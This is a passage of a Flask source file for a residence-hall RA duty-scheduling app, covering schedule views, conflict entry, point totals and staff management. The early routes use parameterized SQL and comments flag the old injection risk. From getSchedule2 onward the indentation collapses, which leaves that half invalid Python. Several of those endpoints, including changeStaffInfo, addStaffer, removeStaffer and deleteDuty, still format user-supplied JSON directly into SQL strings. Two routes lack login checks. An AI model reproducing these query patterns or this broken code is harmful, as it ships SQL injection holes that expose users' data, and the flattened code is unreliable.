    without it an anonymous request reaches getAuth(), which assumes an
    authenticated current_user.
    """
    userDict = getAuth()  # Get the user's info from our database
    if type(userDict) != dict:
        # getAuth() returned a redirect response instead of user info
        # (same guard the index view applies)
        return userDict
    return render_template("conflicts.html", auth_level=userDict["auth_level"],
                           curView=2, opts=baseOpts, hall_name=userDict["hall_name"])
@app.route("/editSched")
@login_required
def editSched():
    """Render the schedule editor (AHD level 2+ only)."""
    userDict = getAuth()  # Get the user's info from our database
    if userDict["auth_level"] < 2:
        logging.info("User Not Authorized - RA: {}".format(userDict["ra_id"]))
        return jsonify(stdRet(-1, "NOT AUTHORIZED"))
    start, end = getCurSchoolYear()
    ptDict = getRAStats(userDict["hall_id"], start, end)
    logging.debug("Point Dict: {}".format(ptDict))
    cur = conn.cursor()
    # Parameterized query (was built with str.format() -- SQL injection risk)
    cur.execute("SELECT id, first_name, last_name, color FROM ra "
                "WHERE hall_id = %s ORDER BY first_name ASC;",
                (userDict["hall_id"],))
    # ptDict entries are sorted alphabetically by the RA's last name
    return render_template("editSched.html", raList=cur.fetchall(), auth_level=userDict["auth_level"],
                           ptDict=sorted(ptDict.items(), key=lambda x: x[1]["name"].split(" ")[1]),
                           curView=3, opts=baseOpts, hall_name=userDict["hall_name"])
@app.route("/editCons")
@login_required
def editCons():
    """Render the conflicts editor (AHD level 2+ only)."""
    userDict = getAuth()
    if userDict["auth_level"] < 2:
        logging.info("User Not Authorized - RA: {}".format(userDict["ra_id"]))
        return jsonify(stdRet(-1, "NOT AUTHORIZED"))
    cur = conn.cursor()
    # Parameterized query (was built with str.format() -- SQL injection risk)
    cur.execute("SELECT id, first_name, last_name, color FROM ra "
                "WHERE hall_id = %s ORDER BY first_name ASC;",
                (userDict["hall_id"],))
    return render_template("editCons.html", raList=cur.fetchall(), auth_level=userDict["auth_level"],
                           curView=3, opts=baseOpts, hall_name=userDict["hall_name"])
@app.route("/staff")
@login_required
def manStaff():
    """Render the staff management page (HD level 3+ only)."""
    userDict = getAuth()  # Get the user's info from our database
    if userDict["auth_level"] < 3:
        logging.info("User Not Authorized - RA: {}".format(userDict["ra_id"]))
        return jsonify(stdRet(-1, "NOT AUTHORIZED"))
    start, end = getCurSchoolYear()
    cur = conn.cursor()
    # Parameterized query (was built with str.format() -- SQL injection risk)
    cur.execute("""SELECT ra.id, first_name, last_name, email, date_started, res_hall.name, color, auth_level
                   FROM ra JOIN res_hall ON (ra.hall_id = res_hall.id)
                   WHERE hall_id = %s ORDER BY ra.id ASC;""",
                (userDict["hall_id"],))
    ptStats = getRAStats(userDict["hall_id"], start, end)
    return render_template("staff.html", raList=cur.fetchall(), auth_level=userDict["auth_level"],
                           opts=baseOpts, curView=4, hall_name=userDict["hall_name"], pts=ptStats)
@app.route("/hall")
@login_required
def manHall():
    """Render the Manage Hall settings page (HD level 3+ only)."""
    userDict = getAuth()
    if userDict["auth_level"] < 3:
        logging.info("User Not Authorized - RA: {} attempted to reach Manage Hall page".format(userDict["ra_id"]))
        return jsonify(stdRet(-1, "NOT AUTHORIZED"))
    settings = getHallSettings(userDict["hall_id"])
    return render_template(
        "hall.html",
        opts=baseOpts,
        curView=4,
        settingList=settings,
        auth_level=userDict["auth_level"],
        hall_name=userDict["hall_name"],
    )
@app.route("/editBreaks", methods=['GET'])
@login_required
def editBreaks():
    """Render the break-duty editor (AHD level 2+ only)."""
    userDict = getAuth()
    if userDict["auth_level"] < 2:
        logging.info("User Not Authorized - RA: {}".format(userDict["ra_id"]))
        return jsonify(stdRet(-1, "NOT AUTHORIZED"))
    start, end = getCurSchoolYear()
    logging.debug(start)
    logging.debug(end)
    bkDict = getRABreakStats(userDict["hall_id"], start, end)
    logging.debug(bkDict)
    cur = conn.cursor()
    # Parameterized query (was built with str.format() -- SQL injection risk)
    cur.execute("SELECT id, first_name, last_name, color FROM ra "
                "WHERE hall_id = %s ORDER BY first_name ASC;",
                (userDict["hall_id"],))
    # bkDict entries are sorted alphabetically by the RA's last name
    return render_template("editBreaks.html", raList=cur.fetchall(), auth_level=userDict["auth_level"],
                           bkDict=sorted(bkDict.items(), key=lambda x: x[1]["name"].split(" ")[1]),
                           curView=3, opts=baseOpts, hall_name=userDict["hall_name"])
# -- API --
@app.route("/api/enterConflicts/", methods=['POST'])
@login_required
def processConflicts():
    """API hook: replace the logged-in RA's conflicts for a month.

    Expects JSON with 'monthNum', 'year' and 'conflicts' (list of
    YYYY-MM-DD strings); inserts the new dates and deletes the ones no
    longer submitted.
    """
    logging.debug("Process Conflicts")
    userDict = getAuth()  # Get the user's info from our database
    ra_id = userDict["ra_id"]
    hallId = userDict["hall_id"]
    logging.debug(request.json)
    monthNum = request.json["monthNum"]
    year = request.json["year"]
    conflicts = request.json["conflicts"]
    cur = conn.cursor()
    # All values are passed as query parameters -- the month/year come from
    # client-supplied JSON and must not be interpolated into the SQL string.
    cur.execute("""SELECT TO_CHAR(day.date, 'YYYY-MM-DD')
                   FROM conflicts JOIN day ON (conflicts.day_id = day.id)
                                  JOIN ra ON (ra.id = conflicts.ra_id)
                                  JOIN month ON (month.id = day.month_id)
                   WHERE num = %s
                   AND EXTRACT(YEAR from year) = %s
                   AND hall_id = %s
                   AND ra.id = %s;""", (monthNum, year, hallId, ra_id))
    prevConflicts = cur.fetchall()
    prevSet = set([i[0] for i in prevConflicts])
    newSet = set(conflicts)
    # Get a set of dates that were previously entered but are not in the latest
    # These items should be removed from the DB
    deleteSet = prevSet.difference(newSet)
    # Get a set of dates that have been submitted that were not previously
    # These items should be inserted into the DB
    addSet = newSet.difference(prevSet)
    logging.debug("DataConflicts: {}".format(conflicts))
    logging.debug("PrevSet: {}".format(prevSet))
    logging.debug("NewSet: {}".format(newSet))
    logging.debug("DeleteSet: {}".format(deleteSet))
    logging.debug("AddSet: {}".format(addSet))
    if len(deleteSet) > 0:
        # psycopg2 adapts a Python tuple to a parenthesised SQL list,
        # which is the supported way to parameterize an IN clause.
        cur.execute("""DELETE FROM conflicts
                       WHERE conflicts.day_id IN (
                            SELECT conflicts.day_id
                            FROM conflicts
                            JOIN day ON (conflicts.day_id = day.id)
                            WHERE TO_CHAR(day.date, 'YYYY-MM-DD') IN %s
                            AND conflicts.ra_id = %s
                       );""", (tuple(deleteSet), ra_id))
    if len(addSet) > 0:
        cur.execute("""INSERT INTO conflicts (ra_id, day_id)
                       SELECT %s, day.id FROM day
                       WHERE TO_CHAR(day.date, 'YYYY-MM-DD') IN %s
                       """, (ra_id, tuple(addSet)))
    conn.commit()
    cur.close()
    # Send the user back to the main page (Not utilized by client currently)
    return jsonify(stdRet(1, "successful"))
@app.route("/api/getStaffInfo", methods=["GET"])
@login_required
def getStaffStats():
    """API hook: return the hall's RA roster plus their point totals."""
    userDict = getAuth()
    if userDict["auth_level"] < 3:  # If the user is not at least an AHD
        logging.info("User Not Authorized - RA: {}".format(userDict["ra_id"]))
        return jsonify(stdRet(-1, "NOT AUTHORIZED"))
    cur = conn.cursor()
    # Parameterized query (was built with str.format() -- SQL injection risk)
    cur.execute("""SELECT ra.id, first_name, last_name, email, date_started, res_hall.name, color, auth_level
                   FROM ra JOIN res_hall ON (ra.hall_id = res_hall.id)
                   WHERE hall_id = %s ORDER BY ra.id DESC;""",
                (userDict["hall_id"],))
    start, end = getCurSchoolYear()
    pts = getRAStats(userDict["hall_id"], start, end)
    ret = {"raList": cur.fetchall(), "pts": pts}
    return jsonify(ret)
@app.route("/api/getStats", methods=["GET"])
@login_required
def getRAStats(hallId=None, startDateStr=None, endDateStr=None, maxBreakDay=None):
    """API hook / internal helper: RA duty-point totals for a date range.

    When called over HTTP all parameters are None and the hall id comes
    from the logged-in user while 'start'/'end' come from request.args;
    when called internally the caller supplies them directly.  Returns a
    dict {ra_id: {"name": ..., "pts": ...}} (jsonified for the client).
    """
    fromServer = True
    if hallId is None and startDateStr is None \
       and endDateStr is None and maxBreakDay is None:
        # Effectively: the API was called from the client, not the server
        userDict = getAuth()  # Get the user's info from our database
        hallId = userDict["hall_id"]
        fromServer = False
        startDateStr = request.args.get("start")
        endDateStr = request.args.get("end")
    logging.debug("Get RA Stats - FromServer: {}".format(fromServer))
    res = {}
    cur = conn.cursor()
    breakDutyStart = startDateStr
    if maxBreakDay is None:
        # Calculate the TOTAL number of points each RA has over the whole
        # period, including all break duties.
        breakDutyEnd = endDateStr
    else:
        # Calculate REGULAR duty points plus the BREAK duty points for the
        # specified month only.
        breakDutyEnd = maxBreakDay
    logging.debug("breakDutyStart: {}".format(breakDutyStart))
    logging.debug("breakDutyEnd: {}".format(breakDutyEnd))
    # Parameterized query (was built with str.format() -- the start/end
    # strings can come straight from request.args: SQL injection risk).
    cur.execute("""SELECT ra.id, ra.first_name, ra.last_name, COALESCE(ptQuery.pts,0)
                   FROM
                   (
                       SELECT combined_res.rid AS rid, CAST(SUM(combined_res.pts) AS INTEGER) AS pts
                       FROM
                       (
                          SELECT ra.id AS rid, SUM(duties.point_val) AS pts
                          FROM duties JOIN day ON (day.id=duties.day_id)
                                      JOIN ra ON (ra.id=duties.ra_id)
                          WHERE duties.hall_id = %s
                          AND duties.sched_id IN
                          (
                              SELECT DISTINCT ON (schedule.month_id) schedule.id
                              FROM schedule
                              WHERE schedule.hall_id = %s
                              AND schedule.month_id IN
                              (
                                  SELECT month.id
                                  FROM month
                                  WHERE month.year >= TO_DATE(%s, 'YYYY-MM-DD')
                                  AND month.year <= TO_DATE(%s, 'YYYY-MM-DD')
                              )
                              ORDER BY schedule.month_id, schedule.created DESC, schedule.id DESC
                          )
                          GROUP BY rid
                          UNION
                          SELECT ra.id AS rid, SUM(break_duties.point_val) AS pts
                          FROM break_duties JOIN day ON (day.id=break_duties.day_id)
                                            JOIN ra ON (ra.id=break_duties.ra_id)
                          WHERE break_duties.hall_id = %s
                          AND day.date BETWEEN TO_DATE(%s, 'YYYY-MM-DD')
                                           AND TO_DATE(%s, 'YYYY-MM-DD')
                          GROUP BY rid
                       ) AS combined_res
                       GROUP BY combined_res.rid
                   ) ptQuery
                   RIGHT JOIN ra ON (ptQuery.rid = ra.id)
                   WHERE ra.hall_id = %s;""",
                (hallId, hallId, startDateStr, endDateStr,
                 hallId, breakDutyStart, breakDutyEnd, hallId))
    raList = cur.fetchall()
    for ra in raList:
        res[ra[0]] = {"name": ra[1] + " " + ra[2], "pts": ra[3]}
    cur.close()
    if fromServer:
        # Internal call: return the plain dict
        return res
    else:
        # Client call: return a JSON response object
        return jsonify(res)
@app.route("/api/getSchedule", methods=["GET"])
@login_required
def getSchedule2(start=None,end=None,hallId=None, showAllColors=None):
# API Hook that will get the requested schedule for a given month.
# The month will be given via request.args as 'monthNum' and 'year'.
# The server will then query the database for the appropriate schedule
# and send back a jsonified version of the schedule. If no month and
# subsequently no schedule is found in the database, the server will
# return an empty list
fromServer = True
if start is None and end is None and hallId is None and showAllColors is None: # Effectively: If API was called from the client and not from the server
start = request.args.get("start").split("T")[0] # No need for the timezone in our current application
end = request.args.get("end").split("T")[0] # No need for the timezone in our current application
showAllColors = request.args.get("allColors") == "true" # Should all colors be displayed or only the current user's colors
userDict = getAuth() # Get the user's info from our database
hallId = userDict["hall_id"]
fromServer = False
logging.debug("Get Schedule - From Server: {}".format(fromServer))
res = []
cur = conn.cursor()
cur.execute("""
SELECT ra.first_name, ra.last_name, ra.color, ra.id, TO_CHAR(day.date, 'YYYY-MM-DD')
FROM duties JOIN day ON (day.id=duties.day_id)
JOIN RA ON (ra.id=duties.ra_id)
WHERE duties.hall_id = {}
AND duties.sched_id IN
(
SELECT DISTINCT ON (schedule.month_id) schedule.id
FROM schedule
WHERE schedule.hall_id = {}
AND schedule.month_id IN
(
SELECT month.id
FROM month
WHERE month.year >= TO_DATE('{}','YYYY-MM')
AND month.year <= TO_DATE('{}','YYYY-MM')
)
ORDER BY schedule.month_id, schedule.created DESC, schedule.id DESC
)
AND day.date >= TO_DATE('{}','YYYY-MM-DD')
AND day.date <= TO_DATE('{}','YYYY-MM-DD')
ORDER BY day.date ASC;
""".format(hallId, hallId, start[:-3], end[:-3], start, end))
rawRes = cur.fetchall()
logging.debug("RawRes: {}".format(rawRes))
for row in rawRes:
# If the ra is the same as the user, then display their color
# Otherwise, display a generic color.
# logging.debug("Ra is same as user? {}".format(userDict["ra_id"] == row[3]))
if not(showAllColors):
# If the desired behavior is to not show all of the unique RA colors
# then check to see if the current user is the ra on the duty being
# added. If it is the ra, show their unique color, if not, show the
# same color.
if userDict["ra_id"] == row[3]:
c = row[2]
else:
c = "#2C3E50"
# If the desired behavior is to show all of the unique RA colors, then
# simply set their color.
else:
c = row[2]
res.append({
"id": row[3],
"title": row[0] + " " + row[1],
"start": row[4],
"color": c,
"extendedProps": {"dutyType": "std"}
})
if fromServer:
return res
else:
return jsonify(res)
@app.route("/api/getMonth", methods=["GET"])
def getMonth(monthNum=None,year=None):
# API Hook that will get the requested month format.
# This function generates a blank calendar to return to the client for
# the given year and monthNum (1-12)
if monthNum == None and year == None: # Effectively: If API was called from the client and not from the server
monthNum = int(request.args.get("monthNum"))
year = int(request.args.get("year"))
logging.debug("Get Month - MonthNum: {}, Year: {}".format(monthNum, year))
res = {}
dateList = []
for week in cc.monthdayscalendar(year,monthNum):
weeklst = []
for day in week:
weeklst.append({"date":day,"ras":[]})
dateList.append(weeklst)
res["dates"] = dateList
res["month"] = calendar.month_name[monthNum]
return jsonify(res)
@app.route("/api/runScheduler", methods=["POST"])
def runScheduler(hallId=None, monthNum=None, year=None):
# API Hook that will run the scheduler for a given month.
# The month will be given via request.args as 'monthNum' and 'year'.
# Additionally, the dates that should no have duties are also sent via
# request.args and can either be a string of comma separated integers
# ("1,2,3,4") or an empty string ("").
# -- Check authorization --
userDict = getAuth() # Get the user's info from our database
if userDict["auth_level"] < 2: # If the user is not at least an AHD
logging.info("User Not Authorized - RA: {}".format(userDict["ra_id"]))
return jsonify(stdRet(-1,"NOT AUTHORIZED"))
logging.debug("Request.json: {}".format(request.json))
# -- Begin parsing provided parameters --
fromServer = True
if monthNum == None and year == None and hallId == None: # Effectively: If API was called from the client and not from the server
monthNum = int(request.json["monthNum"])
year = int(request.json["year"])
userDict = getAuth() # Get the user's info from our database
hallId = userDict["hall_id"]
fromServer = False
logging.debug("Run Scheduler - From Server: {}".format(fromServer))
res = {}
try:
if request.json["noDuty"] != "":
noDutyList = [int(d) for d in request.json["noDuty"].split(",")]
else:
noDutyList = []
if request.json["eligibleRAs"] != "":
eligibleRAs = [int(i) for i in request.json["eligibleRAs"]]
eligibleRAStr = "AND ra.id IN ({});".format(str(eligibleRAs)[1:-1])
else:
eligibleRAStr = ";"
except: # If error, send back an error message
return jsonify(stdRet(-1,"Error parsing No Duty Days and Eligible RAs"))
hallId = userDict["hall_id"]
cur = conn.cursor()
# -- Find the month in the Database
cur.execute("SELECT id, year FROM month WHERE num = {} AND EXTRACT(YEAR FROM year) = {}".format(monthNum,year))
monthId, date = cur.fetchone() # Get the month_id from the database
logging.debug("MonthId: {}".format(monthId))
if monthId == None: # If the database does not have the correct month
logging.warning("Unable to find month {}/{} in DB".format(monthNum,year))
return jsonify(stdRet(-1,"Unable to find month {}/{} in DB".format(monthNum,year)))
# -- Get all eligible RAs and their conflicts --
# Select all RAs in a particular hall whose auth_level is below 3 (HD)
# as well as all of their respective conflicts for a given month
queryStr = """
SELECT first_name, last_name, id, hall_id, date_started,
COALESCE(cons.array_agg, ARRAY[]::date[])
FROM ra LEFT OUTER JOIN (
SELECT ra_id, ARRAY_AGG(days.date)
FROM conflicts JOIN (
SELECT id, date
FROM day
WHERE month_id = {}
) AS days
ON (conflicts.day_id = days.id)
GROUP BY ra_id
) AS cons
ON (ra.id = cons.ra_id)
WHERE ra.hall_id = {}
AND ra.auth_level < 3 {}
""".format(monthId, hallId, eligibleRAStr)
logging.debug(queryStr)
cur.execute(queryStr) # Query the database for the appropriate RAs and their respective information
partialRAList = cur.fetchall()
# -- Get the start and end date for the school year --
start, end = getSchoolYear(date.month, date.year)
# -- Get the number of points that the RAs have --
# Calculate maxBreakDay
dateNum = calendar.monthrange(date.year, date.month)[1]
mBD = "{:04d}-{:02d}-{:02d}".format(date.year, date.month, dateNum)
ptsDict = getRAStats(userDict["hall_id"], start, end, maxBreakDay=mBD)
logging.debug("ptsDict: {}".format(ptsDict))
# -- Assemble the RA List --
ra_list = [RA(res[0],res[1],res[2],res[3],res[4],res[5],ptsDict[res[2]]["pts"]) for res in partialRAList]
# logging.debug("RA_LIST_______________________")
# for ra in ra_list:
# logging.debug("Name: {}".format(ra.getName()))
# logging.debug("ID: {}".format(ra.getId()))
# logging.debug("Hall: {}".format(ra.getHallId()))
# logging.debug("Started: {}".format(ra.getStartDate()))
# logging.debug("Hash: {}".format(hash(ra)))
#
# input()
# Set the Last Duty Assigned Tolerance based on floor dividing the number of
# RAs by 2 then adding 1. For example, with a staff of 15, the LDA Tolerance
# would be 8 days.
ldat = (len(ra_list) // 2) + 1
# Get the last ldaTolerance number of days worth of duties from the previous month
# If the current monthNum is 1
if monthNum == 1:
# Then the previous month is 12 of the previous year
startMonthStr = '{}-12'.format(year - 1)
else:
startMonthStr = '{}-{}'.format(year, "{0:02d}".format(monthNum - 1))
endMonthStr = '{}-{}'.format(year, "{0:02d}".format(monthNum))
logging.debug("StartMonthStr: {}".format(startMonthStr))
logging.debug("EndMonthStr: {}".format(endMonthStr))
logging.debug("Hall Id: {}".format(userDict["hall_id"]))
logging.debug("Year: {}".format(year))
logging.debug('MonthNum: {0:02d}'.format(monthNum))
logging.debug("LDAT: {}".format(ldat))
cur.execute("""SELECT ra.first_name, ra.last_name, ra.id, ra.hall_id,
ra.date_started, day.date - TO_DATE('{}-{}-01','YYYY-MM-DD')
FROM duties JOIN day ON (day.id=duties.day_id)
JOIN ra ON (ra.id=duties.ra_id)
WHERE duties.hall_id = {}
AND duties.sched_id IN (
SELECT DISTINCT ON (schedule.month_id) schedule.id
FROM schedule
WHERE schedule.hall_id = {}
AND schedule.month_id IN (
SELECT month.id
FROM month
WHERE month.year >= TO_DATE('{}','YYYY-MM')
AND month.year <= TO_DATE('{}','YYYY-MM')
)
ORDER BY schedule.month_id, schedule.created DESC, schedule.id DESC
)
AND day.date >= TO_DATE('{}-{}-01','YYYY-MM-DD') - {}
AND day.date <= TO_DATE('{}-{}-01','YYYY-MM-DD') - 1
ORDER BY day.date ASC;
""".format(year,'{0:02d}'.format(monthNum), userDict["hall_id"], userDict["hall_id"], \
startMonthStr, endMonthStr, year, '{0:02d}'.format(monthNum), \
ldat, year, '{0:02d}'.format(monthNum)))
prevDuties = cur.fetchall()
# Create shell RA objects that will hash to the appropriate value
prevRADuties = [ ( RA(d[0],d[1],d[2],d[3],d[4]), d[5] ) for d in prevDuties ]
logging.debug("PREVIOUS DUTIES: {}".format(prevRADuties))
# -- Query DB for list of break duties for the month. --
# In version 4.0 of the scheduler, break duties essentially are treated
# like noDutyDates and are skipped in the scheduling process. As a result,
# only the date is needed.
cur.execute("""
SELECT TO_CHAR(day.date, 'DD')
FROM break_duties JOIN day ON (break_duties.day_id = day.id)
WHERE break_duties.month_id = {}
AND break_duties.hall_id = {}
""".format(monthId, userDict["hall_id"]))
breakDuties = [ int(row[0]) for row in cur.fetchall() ]
logging.debug("Break Duties: {}".format(breakDuties))
# Attempt to run the scheduler using deep copies of the raList and noDutyList.
# This is so that if the scheduler does not resolve on the first run, we
# can modify the parameters and try again with a fresh copy of the raList
# and noDutyList.
copy_raList = cp.deepcopy(ra_list)
copy_noDutyList = cp.copy(noDutyList)
completed = False
successful = True
while not completed:
# Create the Schedule
sched = scheduler4_0.schedule(copy_raList, year, monthNum,\
noDutyDates=copy_noDutyList, ldaTolerance=ldat, \
prevDuties=prevRADuties, breakDuties=breakDuties)
if len(sched) == 0:
# If we were unable to schedule with the previous parameters,
if ldat > 1:
# And the LDATolerance is greater than 1
# then decrement the LDATolerance by 1 and try again
logging.info("DECREASE LDAT: {}".format(ldat))
ldat -= 1
copy_raList = cp.deepcopy(ra_list)
copy_noDutyList = cp.copy(noDutyList)
else:
# The LDATolerance is not greater than 1 and we were unable to schedule
completed = True
successful = False
else:
# We were able to create a schedule
completed = True
logging.debug("Schedule: {}".format(sched))
if not successful:
logging.info("Unable to Generate Schedule for Hall: {} MonthNum: {} Year: {}".format(userDict["hall_id"], monthNum, year))
return jsonify(stdRet(0,"UNABLE TO GENERATE SCHEDULE"))
# Add the schedule to the database and get its ID
cur.execute("INSERT INTO schedule (hall_id, month_id, created) VALUES ({},{},NOW()) RETURNING id;".format(hallId, monthId))
schedId = cur.fetchone()[0]
conn.commit()
logging.debug("Schedule ID: {}".format(schedId))
# Get the id of the schedule that was just created
#cur.execute("SELECT id FROM schedule WHERE hall_id = {} AND month_id = {} ORDER BY created DESC, id DESC;".format(hallId, monthId))
#schedId = cur.fetchone()[0]
# Map the day id to the date
days = {}
cur.execute("SELECT EXTRACT(DAY FROM date), id FROM day WHERE month_id = {};".format(monthId))
for res in cur.fetchall():
days[res[0]] = res[1]
# Iterate through the schedule
dutyDayStr = ""
noDutyDayStr = ""
for d in sched:
# If there are RAs assigned to this day
if d.numberOnDuty() > 0:
for r in d:
dutyDayStr += "({},{},{},{},{}),".format(hallId, r.getId(), days[d.getDate()], schedId, d.getPoints())
else:
noDutyDayStr += "({},{},{},{}),".format(hallId, days[d.getDate()], schedId, d.getPoints())
# Attempt to save the schedule to the DB
try:
# Add all of the duties that were scheduled for the month
if dutyDayStr != "":
cur.execute("""
INSERT INTO duties (hall_id, ra_id, day_id, sched_id, point_val) VALUES {};
""".format(dutyDayStr[:-1]))
# Add all of the blank duty values for days that were not scheduled
if noDutyDayStr != "":
cur.execute("""
INSERT INTO duties (hall_id, day_id, sched_id, point_val) VALUES {};
""".format(noDutyDayStr[:-1]))
except psycopg2.IntegrityError:
logging.debug("ROLLBACK")
conn.rollback()
conn.commit()
cur.close()
logging.info("Successfully Generated Schedule: {}".format(schedId))
if fromServer:
return stdRet(1,"successful")
else:
return jsonify(stdRet(1,"successful"))
@app.route("/api/changeStaffInfo", methods=["POST"])
@login_required
def changeStaffInfo():
userDict = getAuth() # Get the user's info from our database
hallId = userDict["hall_id"]
if userDict["auth_level"] < 3: # If the user is not at least an AHD
logging.info("User Not Authorized - RA: {}".format(userDict["ra_id"]))
return jsonify(stdRet(-1,"NOT AUTHORIZED"))
data = request.json
cur = conn.cursor()
cur.execute("""UPDATE ra
SET first_name = '{}', last_name = '{}',
date_started = TO_DATE('{}', 'YYYY-MM-DD'),
color = '{}', email = '{}', auth_level = {}
WHERE id = {};
""".format(data["fName"],data["lName"], \
data["startDate"],data["color"], \
data["email"],data["authLevel"], \
data["raID"]))
conn.commit()
cur.close()
return jsonify(stdRet(1,"successful"))
@app.route("/api/removeStaffer", methods=["POST"])
@login_required
def removeStaffer():
userDict = getAuth()
if userDict["auth_level"] < 3: # If the user is not at least an AHD
logging.info("User Not Authorized - RA: {}".format(userDict["ra_id"]))
return jsonify(stdRet(-1,"NOT AUTHORIZED"))
raID = request.json
checkCur = conn.cursor()
checkCur.execute("SELECT hall_id FROM ra WHERE id = {};".format(raID))
if userDict["hall_id"] != checkCur.fetchone()[0]:
return jsonify("NOT AUTHORIZED")
checkCur.close()
cur = conn.cursor()
cur.execute("UPDATE ra SET hall_id = 0 WHERE id = {};".format(raID))
conn.commit()
cur.close()
return jsonify(raID)
@app.route("/api/addStaffer", methods=["POST"])
@login_required
def addStaffer():
userDict = getAuth()
if userDict["auth_level"] < 3: # If the user is not at least an AHD
logging.info("User Not Authorized - RA: {}".format(userDict["ra_id"]))
return jsonify(stdRet(-1,"NOT AUTHORIZED"))
data = request.json
checkCur = conn.cursor()
checkCur.execute("SELECT * FROM ra WHERE email = '{}';".format(data["email"]))
checkRes = checkCur.fetchone()
if checkRes is not None:
cur = conn.cursor()
cur.execute("UPDATE ra SET hall_id = {} WHERE email = '{}';".format(userDict["hall_id"], data["email"]))
conn.commit()
cur.execute("SELECT * FROM ra WHERE email = '{}';".format(data["email"]))
ret = cur.fetchone()
cur.close()
return jsonify(ret)
cur = conn.cursor()
cur.execute("""
INSERT INTO ra (first_name,last_name,hall_id,date_started,color,email,auth_level)
VALUES ('{}','{}',{},NOW(),'{}','{}','{}')
RETURNING id;
""".format(data["fName"],data["lName"],userDict["hall_id"],data["color"], \
data["email"],data["authLevel"]))
conn.commit()
newId = cur.fetchone()[0]
cur.execute("""SELECT ra.id, first_name, last_name, email, date_started, res_hall.name, color, auth_level
FROM ra JOIN res_hall ON (ra.hall_id = res_hall.id)
WHERE ra.id = {};""".format(newId))
raData = cur.fetchone()
cur.close()
return jsonify(raData)
@app.route("/api/changeRAonDuty", methods=["POST"])
@login_required
def changeRAforDutyDay():
userDict = getAuth()
if userDict["auth_level"] < 2: # If the user is not at least an AHD
logging.info("User Not Authorized - RA: {}".format(userDict["ra_id"]))
return jsonify(stdRet(-1,"NOT AUTHORIZED"))
data = request.json
logging.debug("New RA id: {}".format(data["newId"]))
logging.debug("Old RA Name: {}".format(data["oldName"]))
logging.debug("HallID: {}".format(userDict["hall_id"]))
# Expected as x/x/xxxx
logging.debug("DateStr: {}".format(data["dateStr"]))
fName, lName = data["oldName"].split()
cur = conn.cursor()
# Find New RA
cur.execute("SELECT id, first_name, last_name, color FROM ra WHERE id = {} AND hall_id = {};".format(data["newId"],userDict["hall_id"]))
raParams = cur.fetchone()
# Find Old RA
cur.execute("SELECT id FROM ra WHERE first_name LIKE '{}' AND last_name LIKE '{}' AND hall_id = {}".format(fName, lName, userDict["hall_id"]))
oldRA = cur.fetchone()
cur.execute("SELECT id, month_id FROM day WHERE date = TO_DATE('{}', 'MM/DD/YYYY');".format(data["dateStr"]))
dayID, monthId = cur.fetchone()
cur.execute("SELECT id FROM schedule WHERE hall_id = {} AND month_id = {} ORDER BY created DESC, id DESC;".format(userDict["hall_id"],monthId))
schedId = cur.fetchone()
if raParams is not None and dayID is not None and schedId is not None and oldRA is not None:
cur.execute("""UPDATE duties
SET ra_id = {}
WHERE hall_id = {}
AND day_id = {}
AND sched_id = {}
AND ra_id = {}
""".format(raParams[0],userDict["hall_id"],dayID,schedId[0],oldRA[0]))
conn.commit()
cur.close()
ret = stdRet(1,"successful")
# ret["pointDict"] = getRAStats(userDict["hall_id"], start, end)
return jsonify(ret)
else:
# Something is not in the DB
cur.close()
return jsonify(stdRet(0,"Unable to find parameters in DB"))
@app.route("/api/addNewDuty", methods=["POST"])
@login_required
def addNewDuty():
userDict = getAuth()
if userDict["auth_level"] < 2: # If the user is not at least an AHD
logging.info("User Not Authorized - RA: {}".format(userDict["ra_id"]))
return jsonify(stdRet(-1,"NOT AUTHORIZED"))
data = request.json
logging.debug("New RA id: {}".format(data["id"]))
logging.debug("HallID: {}".format(userDict["hall_id"]))
# Expected as x-x-xxxx
logging.debug("DateStr: {}".format(data["dateStr"]))
cur = conn.cursor()
cur.execute("SELECT id FROM ra WHERE id = {} AND hall_id = {};".format(data["id"],userDict["hall_id"]))
raId = cur.fetchone()
if raId is None:
ret = stdRet(-1,"Unable to find RA {} in database".format(data["id"]))
cur.execute("SELECT id, month_id FROM day WHERE date = TO_DATE('{}', 'YYYY-MM-DD');".format(data["dateStr"]))
dayID, monthId = cur.fetchone()
if dayID is None:
cur.close()
logging.warning("Unable to find day {} in database".format(data["dateStr"]))
return stdRet(-1,"Unable to find day {} in database".format(data["dateStr"]))
if monthId is None:
cur.close()
logging.warning("Unable to find month for {} in database".format(data["dateStr"]))
return stdRet(-1,"Unable to find month for {} in database".format(data["dateStr"]))
cur.execute("SELECT id FROM schedule WHERE hall_id = {} AND month_id = {} ORDER BY created DESC, id DESC;".format(userDict["hall_id"],monthId))
schedId = cur.fetchone()
cur.execute("""INSERT INTO duties (hall_id, ra_id, day_id, sched_id, point_val)
VALUES ({}, {}, {}, {}, {});""".format(userDict["hall_id"], raId[0], dayID, schedId[0], data["pts"]))
conn.commit()
cur.close()
logging.debug("Successfully added new duty")
return jsonify(stdRet(1,"successful"))
@app.route("/api/deleteDuty", methods=["POST"])
@login_required
def daleteDuty():
userDict = getAuth()
if userDict["auth_level"] < 2: # If the user is not at least an AHD
logging.info("User Not Authorized - RA: {}".format(userDict["ra_id"]))
return jsonify(stdRet(-1,"NOT AUTHORIZED"))
data = request.json
logging.debug("Deleted Duty RA Name: {}".format(data["raName"]))
logging.debug("HallID: {}".format(userDict["hall_id"]))
# Expected as x-x-xxxx
logging.debug("DateStr: {}".format(data["dateStr"]))
fName, lName = data["raName"].split()
cur = conn.cursor()
cur.execute("SELECT id FROM ra WHERE first_name LIKE '{}' AND last_name LIKE '{}' AND hall_id = {};".format(fName,lName,userDict["hall_id"]))
raId = cur.fetchone()
cur.execute("SELECT id, month_id FROM day WHERE date = TO_DATE('{}', 'MM/DD/YYYY');".format(data["dateStr"]))
dayID, monthId = cur.fetchone()
cur.execute("SELECT id FROM schedule WHERE hall_id = {} AND month_id = {} ORDER BY created DESC, id DESC;".format(userDict["hall_id"],monthId))
schedId = cur.fetchone()
if raId is not None and dayID is not None and schedId is not None:
cur.execute("""DELETE FROM duties
WHERE ra_id = {}
AND hall_id = {}
AND day_id = {}
AND sched_id = {}""".format(raId[0], userDict["hall_id"], dayID, schedId[0]))
conn.commit()
cur.close()
logging.info("Successfully deleted duty")
return jsonify(stdRet(1,"successful"))
else:
cur.close()
logging.info("Unable to locate duty to delete")
return jsonify({"status":0,"error":"Unable to find parameters in DB"})
@app.route("/api/importStaff", methods=["POST"])
@login_required
def importStaff():
userDict = getAuth()
if userDict["auth_level"] < 3: # If the user is not at least an AHD
logging.info("User Not Authorized - RA: {}".format(userDict["ra_id"]))
return jsonify(stdRet(-1,"NOT AUTHORIZED"))
